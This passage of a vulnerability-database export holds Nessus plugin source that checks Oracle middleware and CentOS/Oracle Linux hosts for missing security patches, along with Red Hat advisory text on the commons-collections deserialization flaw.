or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.180116';\n fix = make_list('27438258');\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = '12.2.1.2.180116';\n fix = make_list('26860993');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.180116';\n fix = make_list('27057030');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T16:33:11", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in the Enterprise Manager Base Platform component.", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control Multiple Vulnerabilities (July 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645", "CVE-2017-9798"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": 
"ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/111152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111152);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5645\", \"CVE-2017-9798\");\n script_bugtraq_id(97702, 100872);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control Multiple Vulnerabilities (July 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in the\nEnterprise Manager Base Platform component.\");\n # https://support.oracle.com/rs?type=doc&id=2394520.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19cc26a6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2018 Oracle Critical\nPatch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5645\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Enterprise Manager Cloud Control\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ \"^13\\.2\\.0\\.0(\\.[0-9]+)?$\")\n{\n patchid = \"28161815\";\n fix = \"13.2.0.0.180717\";\n}\nelse if (version =~ \"^12\\.1\\.0\\.5(\\.[0-9]+)?$\")\n{\n patchid = \"28026487\";\n fix = \"12.1.0.5.180717\";\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = 
patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n {\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', \"Missing patch\");\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:35:47", "description": "The version of Oracle WebCenter Content running on the remote host is affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-03-01T00:00:00", "type": "nessus", "title": "Oracle WebCenter Content Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-2564", "CVE-2018-2596", "CVE-2018-2716"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_CONTENT_JAN_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/107090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107090);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-2564\", \"CVE-2018-2596\", \"CVE-2018-2716\");\n script_bugtraq_id(102541, 102545, 102672);\n\n script_name(english:\"Oracle WebCenter Content Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected 
by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebCenter Content running on the remote host is\naffected by multiple vulnerabilities.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_webcenter_content_detect.nasl\");\n script_require_keys(\"installed_sw/Oracle WebCenter Content\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"Oracle WebCenter Content\";\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\ndir = install['path'];\n\ninstall_url = build_url(port: port, qs:dir);\n\nmatches = pregmatch(string:version, pattern:\"([0-9.]+) \\(([0-9.]+)\\)\");\nif (empty_or_null(matches)) audit(AUDIT_VER_FORMAT, version);\nmain_ver = matches[1];\nsub_ver = matches[2];\nbuild = int(sub_ver);\nfixed_build = 0;\n\nreport = '';\n\nif (main_ver == \"12.2.1.3.0\")\n{\n # Patch 27042584\n # 12.2.1.3.0 (158565)\n fixed_build = 158565;;\n patch = 27042584;\n}\nelse if (main_ver == \"12.2.1.2.0\")\n{\n # Patch 27116621\n # 12.2.1.2.0 (158156)\n fixed_build = 158156;\n patch = 27116621;\n}\nelse if (main_ver == \"11.1.1.9.0\")\n{\n # Patch 27042562\n # 11.1.1.9.0 (171120)\n fixed_build = 171120;\n patch = 27042562;\n}\nif (build < fixed_build)\n{\n report = '\\n Installed version : ' + main_ver + ' (' + sub_ver + ')' +\n '\\n Fixed version : ' + main_ver + ' (' + fixed_build + ')' +\n '\\n Required patch : ' + patch + '\\n';\n}\n\nif (report == '') audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, version);\nelse security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:06", "description": "The version of Oracle JDeveloper installed on the remote host is missing a security patch. 
Please see the vendor advisory for additional information.", "cvss3": {}, "published": "2018-07-25T00:00:00", "type": "nessus", "title": "Oracle JDeveloper Information Disclosure Vulnerability (July 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:jdeveloper"], "id": "ORACLE_JDEVELOPER_CPU_JUL_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/111332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111332);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_bugtraq_id(79091);\n\n script_name(english:\"Oracle JDeveloper Information Disclosure Vulnerability (July 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development application installed on the remote host is\naffected by an information disclosure vulnerability within the Bouncy\nCastle Java package\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JDeveloper installed on the remote host is\nmissing a security patch. 
Please see the vendor advisory for \nadditional information.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60bcb092\");\n # https://support.oracle.com/rs?type=doc&id=2394520.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19cc26a6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7940\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdeveloper\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jdeveloper_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle JDeveloper\");\n\n exit(0);\n}\n\ninclude('vcf_extras_oracle.inc');\n\nvar app_info = vcf::oracle_jdev::get_app_info();\n\nvar constraints = [\n { 'min_version':'12.1.3.0', 'fixed_version':'12.1.3.0.180525', 'missing_patch':'27800100' },\n { 'min_version':'12.2.1.2', 'fixed_version':'12.2.1.2.180525', 'missing_patch':'27783350' },\n { 'min_version':'12.2.1.3', 'fixed_version':'12.2.1.3.180607', 'missing_patch':'28151020' }\n # Note: 27957723 appears to be the original patch for 12.2.1.3, but is no longer listed\n];\n\nvcf::oracle_jdev::check_version_and_report(\n app_info:app_info,\n severity:SECURITY_WARNING,\n constraints:constraints\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:32", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. 
Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "CentOS 5 : jakarta-commons-collections (CESA-2015:2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:jakarta-commons-collections", "p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87540", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2671 and \n# CentOS Errata and Security Advisory 2015:2671 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87540);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"CentOS 5 : jakarta-commons-collections (CESA-2015:2671)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-December/021558.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7af40c53\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:32", "description": "From Red Hat Security Advisory 2015:2671 :\n\nUpdated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : jakarta-commons-collections (ELSA-2015-2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:jakarta-commons-collections", "p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87547", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2671 and \n# Oracle Linux Security Advisory ELSA-2015-2671 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87547);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"Oracle Linux 5 : jakarta-commons-collections (ELSA-2015-2671)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2671 :\n\nUpdated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having 
Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-December/005654.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n 
